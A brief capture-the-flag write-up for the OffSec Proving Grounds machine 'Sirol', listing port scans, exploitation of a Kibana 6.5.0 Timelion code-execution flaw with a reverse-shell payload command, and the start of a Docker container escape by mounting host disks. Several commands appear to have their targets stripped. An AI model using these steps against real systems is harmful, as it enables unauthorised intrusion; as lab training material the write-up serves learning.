Writeup for Sirol from offsec Proving Grounds
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Writeup for Sirol from offsec Proving Grounds
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rustscan -a --ulimit 5000
nmap -sC -sV --reason -p22,80,3306,5601,24007
Under the Management tab, we can find the version number of Kibana that is running.
Kibana Version 6.5.0 contains an arbitrary code execution flaw in the Timelion visualizer.
Payload: python -u -host -port 12345 --shell
While we are already the root user, the root directory doesn't seem to have what we are looking for.
Notice that when we list the contents in the root directory, there is a .dockerenv file
. This along with the fact that our hostname is a bunch of alphanumeric characters would likely indicate that we are in a docker container.
Using the command fdisk -l
we can see what other disks are there.
We can then create a directory and mount all other disks.